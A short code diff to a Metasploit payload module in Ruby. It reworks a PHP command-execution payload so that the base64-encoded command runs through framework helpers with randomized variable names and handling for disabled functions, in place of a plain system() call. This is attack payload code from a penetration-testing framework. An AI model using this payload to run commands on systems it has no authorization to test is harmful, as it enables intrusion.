@@ -6,10 +6,11 @@
 
 module MetasploitModule
 
-  CachedSize = 230
+  CachedSize = :dynamic
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions
+  include Msf::Payload::Php
 
   def initialize(info = {})
     super(merge_info(info,
@@ -34,7 +35,14 @@ module MetasploitModule
   # Constructs the payload
   #
   def generate(_opts = {})
-    return super + "system(base64_decode('#{Rex::Text.encode_base64(command_string)}'));"
+    vars = Rex::RandomIdentifier::Generator.new
+    dis = "$#{vars[:dis]}"
+    shell = <<-END_OF_PHP_CODE
+              #{php_preamble(disabled_varname: dis)}
+              $c = base64_decode("#{Rex::Text.encode_base64(command_string)}");
+              #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
+    END_OF_PHP_CODE
+    return super + shell
   end
 
   #
